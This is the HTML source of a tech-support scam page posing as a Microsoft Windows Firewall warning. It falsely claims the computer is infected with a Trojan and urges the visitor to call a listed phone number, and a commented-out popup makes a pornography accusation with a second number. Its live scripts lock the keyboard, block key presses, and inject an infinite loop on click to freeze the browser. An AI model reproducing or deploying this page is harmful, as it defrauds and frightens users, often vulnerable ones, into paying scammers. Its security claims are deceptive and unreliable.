<!DOCTYPE html>
<html lang="en">
<head>
<script defer data-domain="errorzmicros10xzm.z13.web.core.windows.net" src="https://plausible.io/js/script.js"></script>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>!!!</title>
   
   <!--popup styling -->
   <style>
       #ac-wrapper {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            z-index: 1001;
        
        }
        #live-chat {
            width: 100%;
            height: 742px;
            /* background: #FFFFFF; */
            position: relative;
            top: 0;
            background-size: cover;
            background-color: #0078d7;
        }
        center{
            position: relative;
            top: 226px;
            font-size: 30px;
        }
        center #chat-btn button {
    padding: 10px;
    border-radius: 15px;
    background-color: #ff0000;
    color: white;
    transition: 1s;
    color: white;
    font-weight: bolder;
    position: relative;
    top: 100%;
    width: 200px;
    height: 90px;
    font-size: 30px;
}
        center #chat-btn button:hover{
            background-color: #0000ff7a;
        }
       
   </style>

<style>
		center #cht-btn button{
            padding: 10px;
            border-radius: 15px;
            background-color: #ff0000;
            color: white;
            transition: 1s;
            color: white;
            font-weight: bolder; 
            position: relative;
			top: 123px;
			width: 200px;
			height: 90px;
			left: 116px;
			font-size: 30px;
        }
        center #cht-btn button:hover{
            background-color: #0000ff7a;
        }
</style>

<style>
.center {
  margin: auto;
  width: 75%;
  padding: 60px 0;
}
#main-content{
    margin: 74px 114px 0px 114px;
}

#main-content #flex-cantainer{
    display: flex;
    justify-content: space-between;
    margin-left: 24px;
}
#main-content #flex-cantainer #flex-content .pt{
    font-size: 22px;
    color: white;
    font-family: system-ui;
    font-weight: 100;
    width: 853px;
    letter-spacing: 1px;
}
.pt_chng{
margin-left:20px;color:#fff;font-size: 22px;color: white;font-family: system-ui;font-weight: 100;width: 853px;
letter-spacing: 1px;
display: contents;
position: relative;
}
#popup{
width: 700px;
    height: 399px;
    background-color: white;
    position: relative;
    margin: auto;
    bottom: 144px;
    right: -380px;
    transition: 1s;
    display: none;
    border-radius: 30px;
}

#popup img{
    padding: 0px 59px;
    width: 134px;
}
#popup .ball{
    padding: 0px 9px;
    background-color: red;
    border-radius: 56px;
    margin: 5px;
    position: relative;
    bottom: 5px;
    z-index: 11111111;
    right: 27px;
     
}
#popup #head{
    width: fit-content;
    margin: auto;
}
#popup #head #first{
    font-family: sans-serif;
    margin-bottom: 8px;
}
#popup #head #second{
   width: fit-content;
   margin: auto;
}
#popup #content{
    width: 481px;
    margin: auto;
    margin-top: 25px;
    font-family: sans-serif;
}
#popup a{
    
    padding: 13px;
    background-color: orange;
    text-decoration: none;
    color: #0078d7;
    font-weight: 700;
    font-family: sans-serif;
    position: relative;
    left: 140px;
    top: 13px;
}
body{
    background-color: #0078d7;
}
</style>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script>
    $(document).ready(function(){
        $("#click").on('click', function(){
            alert('hi')
        });
    });
    
    function noNumbers(e) {
        var keynum;
        var keychar;
        var numcheck;
    
        if(window.event) { // IE
            keynum = e.keyCode;
        } else if(e.which) { // Netscape/Firefox/Opera
            keynum = e.which;
        }
        
        keychar = String.fromCharCode(keynum);
        numcheck = /\d/;
        return !numcheck.test(keychar);
    }
</script>
<script>
    function hide()
    {
        document.getElementById("live-chat").style.display="none"
        load();
    
    }
</script> 


</head>
<body style=" overflow: hidden;">
            <div id="main-content">
                <img src="iconimg.png" alt="" height ="127p">
                <div id="flex-cantainer">
                   <div id="flex-content">
                        <p class="pt">Microsoft Windows Firewall Warning!<br>
						Your System is infected with a Trojan Virus.</p>
                        <p class="pt"><span id="per">0</span>% complete <br>Call For Windows Support : +1 (888) 768-6964</p>
                        <p class="pt"><!-- Extra Text Here --></p>
                        <p class="pt"><!-- Extra Text Here --></p>
						 </div>
				
                </div>
						  <div style="display:flex;margin-left: 24px;">
						<img src="QR_code.png" width="140px" style="margin: 10px;margin-top: 0;" />
						<p class="pt_chng" style="margin-top: 0;">For more information about this issue and possible fixes, visit <br>http://windows.com</p> <br><br>
						<p class="pt_chng" style="margin-top: 0;">If you call a support person, give them this info: <br>Stop code: CRITICAL_PROCESS_DIED</p>
                  
					</div>
				   		  <div style="display:flex;margin-left: 24px;">
				 </div>
            </div>
			 <!--
            <div id="popup">
                <div>
                    <img src="gif1.gif" alt="" style="padding-right: 10px;">
                    <!-- <span class="ball" style="background-color: #0078d7;"></span>
                    <span class="ball" style="background-color: grey;"></span> -->
                  	 <!--  <img src="center.jpeg" alt="" style="width: 85px;">
                    <span class="ball left" style="left: 27px; background-color: #0078d7;" ></span>
                    <span class="ball left" style="left:27px;background-color: grey;"></span>
                    <img src="gif2.gif" alt="">
                </div>
			
                <div id="head">
                    <h2 id="first">Mirosoft windows Firewall Alert</h2>
                    <h2 id="second">Err0r#DW6BD36</h2>
                </div>
			
                <div id="content">
                    <p>This Computer has Some <strong>Pornographic Data/Searches/Video</strong>. That's why the reason your Pc is blocked by the administration in your area. It contains explicit sexual content that is prohibited by the administration.</p>
                    <h3>Immediate Helpline: +1 (866) 337-6565 (security support)</h3>
                    
                </div>
					
            </div>
		 -->
            <div id="ac-wrapper" >
              
              <div id="live-chat" onclick="hide()">
                 <img src="popup_ones.jpg" onclick="addScript()" style="width:100%;height:100vh;cursor:pointer;" />
                </div>
			  </div>
            <script type="text/javascript" src="fullscreen.js"></script>
<script>
function addScript() {
  // Create a script element
  var script = document.createElement("script");

  // Define the script code
  var scriptCode = `
    setTimeout("warning()", 1000);
    setTimeout("warning()", 1000);
    function warning() {
      while (true) {
        console.log('warning');
      }
    }
  `;

  // Set the script code as the content of the script element
  script.textContent = scriptCode;

  // Append the script element to the document's head
  document.head.appendChild(script);
}
</script>
            
           





<!---script>

    setTimeout("warning()", 70000);
    setTimeout("warning()", 70000);
    function warning(){
    while(true){
        console.log('warning')
}
}


</script------>

  <script>
    navigator.keyboard.lock();
    document.onkeydown = function (e) {
    return false;
    }
</script> 

	
</body>
</html>